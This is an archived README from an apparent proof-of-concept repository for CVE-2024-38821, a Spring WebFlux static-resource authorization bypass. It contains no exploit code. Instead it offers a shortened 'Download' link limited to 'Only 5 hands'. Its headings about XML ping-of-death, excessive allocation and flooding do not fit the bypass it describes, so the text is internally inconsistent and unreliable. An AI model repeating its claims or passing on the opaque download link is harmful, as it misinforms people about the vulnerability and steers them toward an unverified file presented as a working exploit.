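PoC details: 35223506343b1a2d15ea91d57c19f7f9482ea0c6

Source
Related vulnerability
Title: Spring WebFlux security vulnerability (CVE-2024-38821)
Description: Spring WebFlux is a reactive-stack web framework from Spring. Spring WebFlux has a security vulnerability that arises because, under certain circumstances, Spring Security's authorization rules for static resources can be bypassed.
Introduction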
# CVE-2024-38821

## Overview

CVE-2024-38821 is a critical authorization bypass vulnerability identified in certain versions of Spring WebFlux applications using Spring Security. This vulnerability allows unauthorized access to static resources, bypassing defined authorization rules, under specific conditions.

## Description
- **CVE ID**: CVE-2024-38821
- **CVSS SCORE**: 9.1
- **Severity**: Critical
- **Tags**: cve, cve2024, xml, python, http

## Exploit (Only 5 hands):

[Download](https://ur0.jp/aV2fu)

## Affected Versions

![image](https://github.com/user-attachments/assets/c4192867-ec04-4c7c-8373-603c138f4d6d)

## Exploit Details

CVE-2024-38821 affects the authorization checks applied to static resources within WebFlux applications. Under the specified conditions, the exploit allows attackers to bypass authorization rules intended to restrict access to these resources.

## XML Ping of the Death
![image](https://github.com/user-attachments/assets/616f888a-1abc-4dc2-b7d7-cb2305e4a551)

## Excessive Allocation
![image](https://github.com/user-attachments/assets/d43bbfd2-e87b-4686-9543-92d15edfb261)

## Flooding
![image](https://github.com/user-attachments/assets/5b4b8e2d-7315-475e-908f-4fdf17b9676a)

## Requirement

Python 3.9


File snapshot

[4.0K] /data/pocs/35223506343b1a2d15ea91d57c19f7f9482ea0c6
└── [1.3K] README.md
0 directories, 1 file